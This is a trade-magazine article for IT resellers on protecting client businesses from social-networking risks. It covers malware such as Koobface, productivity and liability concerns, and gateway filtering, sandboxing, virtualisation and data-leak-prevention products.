Controlling anti-social networking – a guide to blocking employees access to Facebook, MySpace and more.

Right now, your customers’ employees are looking at Facebook and surfing MySpace. If that doesn’t worry their employers, it should.

Social networking has only gained popularity in the last three or four years, but it is generating the same concerns that instant messaging did at the start of the decade.

Viral marketing or virus?
Vulnerabilities and associated exploits are found on sites such as MySpace and Facebook with alarming regularity. Some rely on user naivety. One Facebook exploit, Koobface, relies on users accessing a link with an amusing title offering a video download. The link takes them to a site instructing them to download ‘the latest version of Flash’ — which is actually a Trojan — in order to view the material. Similarly, MySpace has been targeted by malware writers leaving comments on their page promising videos but telling people to download fake codecs first, and these attacks often download worms for both sites. Phishing mails masquerading as friend notifications from Facebook have an image attached that’s actually a Trojan and some of these lull suspicion by actually taking you to Facebook. Potentially more dangerous are exploits which require practically no action on the users’ part, save for visiting the site. It takes just five friends and an application form to become ‘a Facebook application developer’ and proof-of-concept malware has already been developed.

But most of your clients won’t be worrying about the danger of having their network taken over, although they may be calling you in to deal with virus attacks more often. They’re more likely to be concerned about the productivity and liability problems of having their employees using Facebook and MySpace indiscriminately. The temptation to ‘just log on for a quick look’ is second only to the temptation to stay.

Facebook in particular is a rat’s nest of status updates, social applications and conversational opportunities, and can suck in well-meaning employees who suddenly forget how long a lunch break is supposed to be.

The liability associated with ill-advised posts is also a problem. Inappropriate jokes posted from a client’s IP address could potentially backfire, but the potential for intellectual property violation is even worse. The terms and conditions on some Web sites are long, and increasingly draconian. Few if any of your clients will have read it, but security experts worry that those terms and conditions could taint a company that lets employees post information, in just the same way as adware T&Cs often taint users by providing unfettered access to everything from private surfing information through to a user’s machine.

Anti-social setup
Such concerns lead to the basic question: to block, or not to block? One obvious choice is to block everything vaguely social. In practice, you might find that this affects morale at your clients’ customers (although with the economy in the current state, reduced access is unlikely to be the last straw for anyone — who’s going to leave at this point?) Some people are also using social networking applications for valid work reasons. Practices such as networking with colleagues in other companies, and joining groups relating to work-based interests are on the rise.

Use Web security gateways to easily apply access policies to a client’s whole employee base. Look for features such as URL filtering, content inspection and malware detection in these appliances, which are designed to be easily deployed and centrally managed. But unlike some other sites, it’s difficult for URL filtering to be granular on many social networking sites. You might block, say, the sports section of the BBC Web site while leaving the financial news intact. But the domain structure on sites like Facebook makes it difficult to block, say, specific sub-applications – especially as these services use AJAX technology to make Web pages more dynamic.

Even if you don’t want to choke off social network sites completely for all users, URL filtering has its benefits. Secure Computing’s Webwasher product lets administrators restrict URLs based on the identity of the person accessing them, for example. Access can be restricted according to groups in an LDAP compatible directory such as Active Directory (maybe your clients’ HR department wants to access LinkedIn to check up on job applicants, but the board doesn’t want anyone else to surf there). Other features include the ability to access sites at certain times, such as weekends. System admins using the Webwasher appliance can also set manual override options that let users enter login credentials and get access to a site for an amount of time predetermined by the administrator.

The problem with social networking sites is that users want to get there – often quite badly. People may decide to subvert network protection measures to do so, if they feel that their right to Internet access is being unfairly denied. Anonymous proxies are a way for users to punch out to these sites without alerting gateway proxies to your destination. Products including Sophos’s Web Security and Control appliance, and Secure Computing’s Webwasher, can spot and stop anonymous proxy use. These appliances keep an ever-growing list of anonymous proxies, as exchanged on message boards and other online hangouts.

URL filtering can also stop some malware delivery vectors. The use of IFRAMES and IMG tags to point to malicious content on other sites means that browsers will make GET requests to those other domains. URL filtering services can be programmed with blacklists, but the best ones maintain a remotely updated list of known offenders, so that when an innocent visit to a social network page prompts a GET request to a Chinese malware server, the user will stand a better chance of being protected.

Coping with JavaScript
JavaScript has become the predominant means of delivering Web-based malware, thanks to its ability to affect clients. Depending on the browser’s vulnerability, it can be used to steal cookies, create file system objects and manipulate browsers to submit requests to other sites.

Gateway appliances like Finjan’s Vital Security NG-5100 and models from Secure Computing inspect the JavaScript in the Web page during transit. However, such inspection has become more difficult to do. JavaScript-based attacks are now being obfuscated, using on-the-fly techniques that change key attributes of the source code, such as variable names, each time they are downloaded. The result is that straightforward signature matching is becoming increasingly ineffectual. Consequently, Finjan, Secure Computing and others use behavioural analysis, looking at the JavaScript’s structure to work out what it is trying to do. If any red flags are raised, the appliance will automatically block the code.


Secure Computing’s Webwasher product has a granular behavioural analysis system. The configuration screen includes a variety of behaviours that an administrator can look for in mobile code including JavaScript and VBScript. Policies can be set for behaviours including read and write access to files and to the system registry, and access to the network. Administrators can also remove snippets of code relating to particular behaviours while letting the majority of the code through.

This is vastly preferable to desktop alternatives such as NoScript, the Firefox plug-in that simply stops all JavaScript from running, regardless of what it is trying to do. That system, which uses a whitelist to only allow JavaScript from certain sites to run, now suffers from the same problem as many other whitelisting technologies — many legitimate sites have been infected with malicious scripts using SQL injection attacks.

Virtually secure
To further lock down the malware dangers inherent in social networking, you might consider virtualisation. Virtualising a user’s social network session means any JavaScript executed during the session only impacts the virtual platform. Internet Explorer 7 on Vista runs in a low-rights ‘protected mode’ that prevents exploits from installing anything without explicit permission from the user by giving process tokens a low integrity level and stopping them from writing to processes with a higher integrity level, so it’s worth mentioning this protection if you’re discussing Windows upgrades.

Internet Explorer 8 and Google’s new Chrome browser run in multiple processes to improve security and Chrome promises more security with each browser tab in a separate process (IE8 only does this after a tab has crashed and been reloaded). Chrome also has a sandboxed environment that uses the process token feature in both Vista and XP to apply a token to each instance of the rendering engine, restricting that rendering engine’s access to system-level resources through Windows security.

Again, on Vista, Chrome uses protected mode so the token for each browser tab stops it writing to a process with a higher integrity level. When the new browsers mature, you can use Group Policy to stipulate your preferred browser, but that’s not advisable while they’re still in beta and alpha release respectively.

An alternative is to virtualise existing browsers. Altiris (now owned by Symantec) offers Software Virtualisation Solution (SVS), which inserts a ‘shim’ between the operating system and installed applications. Apps write to a virtual registry and file system, protecting the underlying operating system from unauthorised changes. If and when a browser is compromised by malware delivered via a social networking system, it can simply be reset, either by the user or from a central console, and it is removed from the system and refreshed with a new copy.

Layers of security
With SVS, you put the management server at your location and remotely manage your clients’ desktops. Operating an appliance remotely is similarly easy. Configure the rules on the router in the client’s office to point to the gateway Web security appliance in your office as a proxy. The appliance filters incoming Web traffic before it reaches your client’s router, essentially turning your office into a demilitarised zone (DMZ) for your clients.

However, filtering for different clients’ domains on a single appliance may be more difficult, depending on the appliance you’re using. The main problem is the routing of the traffic. Astaro, which offers the Astaro Web Gateway Web filtering system, allows support of distant subnets. The quick and easy way to support multiple subnets on the same box is to set up a VPN between the appliance and each office. However, that would still need low-end boxes at the customer site to act as VPN endpoints.

In many cases, such deployments are not officially supported. The Sophos appliance is a 1U rack system specifically designed for on-site deployment, for example. Technically, it could be deployed at a central remote site but the company would have to negotiate a new licensing scheme for it, and traffic routing would need to be managed carefully to avoid different clients seeing each other’s packets. If budgets allow, you can install an appliance at each customer site, and manage them remotely; Astaro offers a free management tool, Command Center. A more elegant solution might be to use a virtual appliance for each customer, many of which can be deployed on the same server. This would solve the routing problem altogether, and make central management easier. Astaro’s Web security gateway can be installed in this way, using VMware as a platform. It is licensed by the number of users.

Central blocking of all clients using an appliance at the network gateway may stop embedded Web page and application attacks, but with social network exploits constantly evolving, it becomes difficult to guarantee protection. Using a gateway may work for people in the office, but unless you can force laptop users to connect via your proxy when they’re using the machine at home on the weekend, it won’t provide total protection. It is possible to use Group Policy settings in Windows Server 2003 to remote the connections tab on the endpoint, which would effectively enforce predefined proxy settings and point the laptop at a chosen proxy server wherever it is.

A defence in depth approach, in which you apply layered security measures at various points in the network, is the best method of protection. Critical Software, which provides a Web security gateway called iCritical, scans malware at the gateway. All reputable Web security gateway vendors do, (and Gartner has stipulated URL filtering, malware protection and content inspection as basic requirements of any such product). Nevertheless, Critical Software also recommends installing the NOD32 Anti-virus product, from Eset, on the desktop. Like many antivirus products today, it uses heuristical analysis rather than simply relying on signature-based scans to protect the endpoint.

Secure your relationship
Another option for monitoring incoming Web traffic is to use the growing number of cloud-based Web filtering services, eliminating the need for capital expenses on equipment and protecting remote users too. These are often available through the channel, with the prerequisite margins. Websense, like Critical Software and MessageLabs, offers an on-demand service. The company sells Websense Hosted Web Security on a per-seat, per-year basis through channel partners.

The danger here is that small businesses will simply opt for a direct relationship with vendors who offer security as a service. The way around that is to sell social network management as part of a holistic security strategy, focusing equally on the need for outbound information control as well as incoming filtering. Web security filters are largely focused on incoming content analysis, but businesses may want to stop unauthorised information being posted to Web sites using tools for endpoint data leak prevention. McAfee Total Protection for Data product can be programmed to recognise when data from a confidential document is copied to the clipboard, making it impossible for clients to post that information to their Facebook pages, for example, and Trend Micro has a similar tool.

Facetime, which sells the Unified Security Gateway, emphasises the two-way nature of the system. The basic box filters incoming traffic, but it is possible to include sidecar modules that impose data leak prevention measures on outgoing information. These use PreciseID, a technology which allows administrators to ‘fingerprint’ documents and use fuzzy matching, going beyond simple keyword definitions.

It nevertheless gets difficult to block everything inappropriate that a user might want to post. This comes down to basic common sense. Putting something in the employee handbook explaining what constitutes sensible use of a social networking system (or indeed any electronic communications mechanism) is a must, and will also protect your clients from liability issues down the line. Using appliances such as FaceTime’s, which provide the option to display end-user disclaimers, can help strengthen your clients’ legal position by proving that they’re taking active steps to remind users of what they should and shouldn’t post online.

Ultimately, protecting your clients against the dangers of social networking comes down to a mixture of judiciously applied technology and common sense. The need for user education shouldn’t be underestimated, and a training course for your clients can be justified on both legal liability and security grounds. Using a combination of these tools should help you protect your clients and make a healthy margin into the bargain.

WorkLight WorkBook

Blocking Facebook altogether can be just as counterproductive in productivity and morale terms as leaving it on. WorkLight, which sells technologies designed to make in-house applications available through social media channels, has tried to find a compromise. Its WorkBook product makes an internal collaboration application available through the FaceBook interface, without exposing that information to Facebook or its other users.

The product is accessed like any other FaceBook application, but it is run behind a firewall and hosted by the user (or, perhaps in this case, your company, on their behalf). That means that the application is safe (although you couldn’t say that for the rest of Facebook)
-- click image to enlarge --

Once logged in, your clients can see a news feed highlighting activities and comments from the rest of their team. The Time Report function is a feature of the WorkBook application, and the groups are also hosted on the WorkBook server, rather than by Facebook itself. Only colleagues get to see information pertaining to the team.
-- click image to enlarge --

Users join internally hosted groups for team discussions. This makes it possible for your clients to conduct private, sensitive discussions without worrying about Facebook’s privacy issues.
-- click image to enlarge --

Updating your profile in this application stores the information on the WorkLight server, so that Facebook users don’t get to see it.
-- click image to enlarge --

Key Links

‘Satan is on my Friends List’ talk from BlackHat 2008.

Using social networking attacks to compromise a client and co-opt it into a botnet.

Astaro Web Gateway



Software Virtualisation Solution Professional

McAfee Total Protection for Data

Worklight WorkBook

Unified Security Gateway

Secure Computing Webwasher

Sophos Web Security and Control

Discussion of social network attacks using password resets

Design document for Chromium sandbox

Discussion of sandbox security in Google Chrome browser

Explanation of protected mode and integrity levels in Windows Vista:

List of social networking applications in FaceTime’s ‘Greynets Guide’


Show other articles by this author

Share |
Write comment
security image
smaller | bigger
Comments (1)
don't click here
Posted: Sep, 26 2010

Time Doctor

Want to block your employees from using Facebook at work?

This application uses a better method than blocking Facebook because it just monitors Facebook on work hours. Team members can use Facebook on lunch breaks. Also some people might need Facebook for work purposes so it's stupid to just block it.



Subscribe and get the magazine in the post before it's online

Subscribe and get access to all of the back issues

To read a sample eMagazine - March 2010



advisor Got a client who wants to make their own Blu-ray discs and needs to know which office PCs they can check them on? (or is honest enough to say they want to watch movies on a plane?) Check what discs they can watch and whether advanced features will work with this Cyberlink utility. read more


Unified communications


The #1 Bestseller for Only 77p

Key resources

Login to view Key Resources